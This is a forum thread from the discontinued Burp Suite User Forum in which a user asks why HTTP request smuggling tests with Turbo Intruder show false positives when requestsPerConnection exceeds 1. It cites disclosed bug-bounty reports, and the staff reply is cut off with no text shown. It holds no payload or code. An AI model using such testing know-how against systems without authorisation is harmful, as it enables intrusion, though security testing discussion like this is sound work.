Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Testing Request Smuggling with Burpsuite.

oXnoOneXo | Last updated: Nov 06, 2023 04:49PM UTC

Hello portswigger team, I’m really confused about certain thing in request smuggling vulnerability which is sending the requests in the same connection or testing the vulnerability with turbo intruder scripts using the value 1 for the requestsPerConnection variable that you also mentioned in the methodology section in this blog: https://portswigger.net/research/http-desync-attacks-what-happened-next Whenever I test for request smuggling, I could always confirm the vulnerability by differential response technique whenever I set the variable requestsPerConnection more than 1, even if it’s just 2 it would work unlike setting it to 1. Besides I did read James's disclosed report in New Relic here: https://hackerone.com/reports/498052 Here James was using the requestPerConnection parameter set to 5 and you managed get the report resolved, and another report here the researcher was using the requestPerConnection to 50 and concurrentConnections to 1 and the report got accepted: https://hackerone.com/reports/867952 So my question can you please explain to me why it would give me a false positive when i set the the value of requestPerConnection more than 1 or why it would give a false positive in this case regardless the value of concurrentConnection variable?. If this is the wrong place to ask such questions can you please suggest me where should i ask?. Regards.

Hannah, PortSwigger Agent | Last updated: Nov 07, 2023 04:45PM UTC